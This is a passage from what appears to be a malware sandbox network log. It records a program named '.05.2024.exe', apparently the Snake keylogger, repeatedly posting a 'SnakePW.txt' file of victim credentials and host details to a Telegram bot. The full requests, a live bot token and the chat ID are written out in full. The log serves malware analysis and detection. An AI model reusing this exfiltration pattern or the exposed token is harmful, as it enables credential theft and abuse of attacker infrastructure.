81	192.168.2.7	49798	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:06 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf532054265df Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:06 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 33 32 30 35 34 32 36 35 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf532054265dfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:06 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:06 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 15 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:06 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 35 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 35 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 15","parameters":{"retry_after":15}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.7	49799	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:07 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf58390560c28 Host: api.telegram.org Content-Length: 551
2024-09-27 10:54:07 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 38 33 39 30 35 36 30 63 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf58390560c28Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:07 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:07 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 14 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:07 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 34 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 14","parameters":{"retry_after":14}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.7	49800	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:08 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf5b1dc6a6862 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:08 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 62 31 64 63 36 61 36 38 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf5b1dc6a6862Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:08 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:08 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 13 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:08 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 33 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 13","parameters":{"retry_after":13}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.7	49801	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:09 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf5eba8e78de7 Host: api.telegram.org Content-Length: 551
2024-09-27 10:54:09 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 65 62 61 38 65 37 38 64 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf5eba8e78de7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:10 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:10 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 11 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:10 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 31 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 31 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 11","parameters":{"retry_after":11}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.7	49802	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:11 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf6876dc1317c Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:11 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 36 38 37 36 64 63 31 33 31 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf6876dc1317cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:11 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:11 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 10 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:11 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.7	49803	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:12 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf6c18fae546b Host: api.telegram.org Content-Length: 551
2024-09-27 10:54:12 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 36 63 31 38 66 61 65 35 34 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf6c18fae546bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:12 UTC	369	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:12 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:12 UTC	109	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.7	49804	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:12 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf7142122a2e8 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:12 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 37 31 34 32 31 32 32 61 32 65 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf7142122a2e8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:21 UTC	369	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:21 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 3 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:21 UTC	109	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 3","parameters":{"retry_after":3}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.7	49805	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:22 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf9d8c62b6eaa Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:22 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 64 38 63 36 32 62 36 65 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf9d8c62b6eaaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:22 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:22 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:22 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 36 32 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36929,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434462,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.7	49806	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:23 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfa418297b08d Host: api.telegram.org Content-Length: 551
2024-09-27 10:54:23 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 34 31 38 32 39 37 62 30 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcfa418297b08dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:23 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:23 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:23 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 36 33 2c 22 64 6f 63 75 Data 